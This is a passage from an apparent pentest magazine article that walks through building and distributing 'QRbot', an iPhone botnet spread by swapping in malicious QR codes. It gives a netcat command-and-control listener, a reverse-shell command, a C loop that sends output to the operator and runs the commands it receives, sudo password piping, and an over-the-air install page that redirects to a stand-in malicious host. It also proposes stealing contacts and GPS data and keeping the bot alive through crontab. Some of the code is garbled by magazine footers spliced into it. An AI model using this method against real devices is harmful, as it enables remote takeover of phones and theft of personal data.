Editor's note

Recommendations

Info

Step 2: Run botnet operator The concept of this botnet is based on a client-server application. The server runs Netcat (built-in program on Linux and Mac), which listens to incoming connections. The following command should be running on the server: nc -k -l 3333 Explanation: Netcat is listening on port 3333 and waiting for another connection after its current connection is completed. Step 3a: Build bot The development of iPhone applications is performed on Xcode (I use version 4.2 on Lion), which can be downloaded and installed for free from Apple’s web site. In addition, in order to be able to sign the application, a developer account is needed – it costs some money. There are ways to bypass signing, but I rather not to discuss them in this article. Our bot is based on reverse backdoor shell attack, which is implemented by using netcat. A reverse backdoor shell is a scenario when a remote device (i.e. iPhone) connects to server (i.e. botnet operator) and then executes local system commands on the device. In order to execute the attack, the following command should be run: nc [operator’s_ip] 3333 -e /bin/bash. However, by default Mac devices don’t support the -e or -c operators. I was testing various versions of “netcat” and tried to compile it for different operating systems, none of them worked in execution mode. Some of you might think that Mac OS/iOS is only a permutation of FreeBSD, however the bottom line is that it won’t work for me. I decided to build my execution mode, which is based on system calls. See the code below to understand the concept (not the complete source code): system(„echo ‘Started QRbot on iPhone by NirV ‘ > ~/result”); while (1) { } system(„cat ~/result | nc [operator_ip] 3333”); system(„nc [operator_ip] 3333 | head -n 1 | awk starterkit 02/2011(2) ‘{system($0)}’ > ~/result”); Note: not all system calls are supported on legal devices, therefore the developer of the bot should consider to implement system commands in Objective C, e.g. connect to the bot operator by using socket and listen to commands. Description: The 1st system call writes a banner to a file. The banner can include a general message or MOBILE PENTESTING include some details about the iPhone, e.g. IP (usually behind a NAT), system version etc. The next commands run in endless loop (while true): cat is a command to print the content of a file; in this case, cat prints the content of the banner or any content in the ~/result file. The 2nd system command is combined of printing the content as explained and passing it as input to the netcat application, which sends the message to the bot operator. Since the operator should have control, the 3rd command opens a netcat and stores the output of the 1st row (the command from the operator), and then the command is passed as STDIN to the awk command, which runs the command on the operating system. Note: even if awk is not installed on the iPhone, the output can be written to bash file and then executed. The 2nd command above is now executed to print the output of the system to the botnet operator. What are the limitations in the code above? My test is based generally on iPhone emulator, however the code might be changed since applications on legal iPhone run in a sandbox with limited permissions. On physical iPhone the bot is running under mobile user (not a root), which means that its current functionality can produce only DDoS attacks. The good thing about this is that it does not matter if the iPhone is jailbroken or not. If we had a root access, what could the QRbot do? Collect personal data e.g. contact lists, emails, last visited GPS locations, run as a malware even after uninstalling the application by adding tasks to the “crontab” (scheduled tasks), steal cache and generally backup the iPhone. Is it hard to get root access? The ‘sudo’ command is not implemented by default on iOS, but the ‘su’ command does. The limitation of ‘su’ is that by running the command, a different shell is started, which means that in this case, running the command as script or as system command is almost impossible. In order to get root in easier way, the password should remain alpine and one of the following should be installed on the iPhone device: OpenSSH or sudo. Important to mention, most of the jailbroken iPhones have at least one of them or these can be installed as part of QRbot. In this case, the attack vector is larger since there are fewer actions that should be accomplished in order to get a root access. To make a long story short, if sudo is installed then the commands above can run with the following command: echo ‘[password]’ | sudo -S [command] If OpenSSH is installed, then reverse ssh tunnel is probably a good solution – Google it. In conclusion, the functionality of the QR botnet depends whether the iPhone is legal or jailbroken, and Page 8 http://pentestmag.com
Figure 4. Botnet operator screen on application load if it is jailbroken, the installed applications should be abused. Step 3b: Verify bot operation After coding the logic into the application, some testing should be done in order to verify that the bot is operating as we expected. In order to do the tests, run the server as explained in step 2 and run the application using Xcode. It is recommended to run first on iPhone Simulator. The first state of the botnet operator should not contain any content, however after running the application, the terminal of the botnet operator should be as Figure 4, which means that the iPhone is connected. Since the iPhone is connected and waiting for commands, the botnet operator should write an iOS system call, e.g. ping –c 4 www.google.com, where the –c 4 means that only four requests are sent. A malicious bot should be running endless loop. The results should be similar to the screenshot in Figure 5. The next step is to build an IPA file and test it on the iPhone. If you have a developer account, then you should know how to do this. If you don’t have a developer account, please Google it. Note that some of the commands that illustrated earlier might not work on the real iPhone, therefore you need to code the features, e.g. file system access, socket etc. Step 4: Publish QRbot on the web By this step we found a vulnerable QR reader and created a bot and botnet operator. In order to install the bot, we need to use a legitimate distribution method. In Figure 5. Control botnet remotely starterkit 02/2011(2) this case, we post the bot on an Internet published IIS web server, this installation type also known as overthe-air (OTA) installation. Additional requirements: static IP address and a DNS name (more reliable), an XML manifest file (view configuration tasks on Apple’s web site) and a developer account as single person or enterprise. The difference between single person to enterprise is the amount of bots per server, meaning that the enterprise account supplies unlimited number of endpoints (iPhone\iPdad). Since the deployment method is explained in details on iOS Developer Library (Apple’s web site), the explanation of this step includes only the important details to make the distribution work as part of the cyber attack. To accomplish the attack, create the following HTML page and name it default.html: Listing 1. Another option is to run the script in a hidden IFRAME or on a blog, as there are many blogging platforms available on the internet, most of which support and provide easy means to set a blog up and running in a matter of minutes. Note that the installation is based on ITMS (aka iTunes Music Store) protocol. Safari will use the link above in order to install the application. Important to mention is that the installation requires user’s approval, which will be discussed in the next step. Step 5: QRjacking & Scanjacking As explained before, social engineering is required in order to implement the attack. The first action should be QRjacking, which means that malicious QR should be replaced with the legal QR. However, it might be Listing 1. QRjacking QRbot //Replace MALSITE.com with your site window.location="itmsservices://?action=downloadmanifest&url=http: //MALSITE.com/manifest.plist"; Page 9 http://pentestmag.com
Page 3 and 4: EDITOR’S NOTE Starter Kit 02/2011
Page 5 and 6: SOCIAL FRAUD 24 Social Engineering
Page 7: QRjacking A malicious sticker can b
Page 11 and 12: Figure 6. Citadel consulting web si
Page 13 and 14: understanding why testing mobile ap
Page 15 and 16: AndroidManifest.xml file. This cent
Page 17 and 18: you need to get stuck in at the tec
Page 19 and 20: password and then end up having to
Page 21 and 22: user has an increased opportunity o
Page 23 and 24: WHAT IS A GOOD FUZZING TOOL? Fuzz t
Page 25 and 26: people into breaking normal securit
Page 27 and 28: that not only are easier, but yield
Page 29 and 30: Preventing deer -in-headlights Get
Page 31 and 32: who are responsible for IT service
Page 33 and 34: analysis that should not be made by
Page 35 and 36: If we have made an in-depth risk an
Page 37 and 38: several security standards in wides
Page 39 and 40: Resource • http://www.iso.org/iso
Page 41 and 42: etc., and create mayhem. And all of
Page 43 and 44: your business managers do not appro

Editor's note

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?